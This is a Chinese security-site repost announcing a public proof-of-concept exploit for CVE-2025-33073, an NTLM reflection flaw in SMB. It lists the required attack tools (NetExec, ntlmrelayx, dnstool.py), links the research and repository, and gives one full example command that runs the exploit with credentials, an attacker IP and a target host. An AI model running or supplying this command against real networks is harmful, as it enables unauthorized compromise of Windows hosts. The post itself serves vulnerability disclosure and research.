CVE-2025-33073 针对 NTLM 反射 SMB 缺陷的 PoC 漏洞

admin 2025年6月14日20:41:21评论66 views字数 701阅读2分20秒阅读模式
CVE-2025-33073 针对 NTLM 反射 SMB 缺陷的 PoC 漏洞

所有荣誉归功于官方研究:

https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

先决条件

操作系统:Kali Linux(已预装大多数软件包)。

  • NetExec(NXC)- https://github.com/Pennyw0rth/NetExec

  • impacket-ntlmrelayx

  • dnstool.py(包含在 repo 中)

  • xterm

示例用法

python3 CVE-2025-33073.py -u 'wintastic.localmathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
CVE-2025-33073 针对 NTLM 反射 SMB 缺陷的 PoC 漏洞

xterm 允许使用鼠标中键进行复制和粘贴。

关于所使用的强制转换的更多信息:

请注意,这只会直接影响你尝试攻击的主机。例如,如果 DC 是 Windows Server 2022,而你尝试攻击的客户端是 Windows 10 机器,那么攻击仍然有效!

CVE-2025-33073 针对 NTLM 反射 SMB 缺陷的 PoC 漏洞

项目地址:

https://github.com/mverschu/CVE-2025-33073?tab=readme-ov-file

原文始发于微信公众号(Ots安全):CVE-2025-33073 针对 NTLM 反射 SMB 缺陷的 PoC 漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月14日20:41:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2025-33073 针对 NTLM 反射 SMB 缺陷的 PoC 漏洞http://cn-sec.com/archives/4165385.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息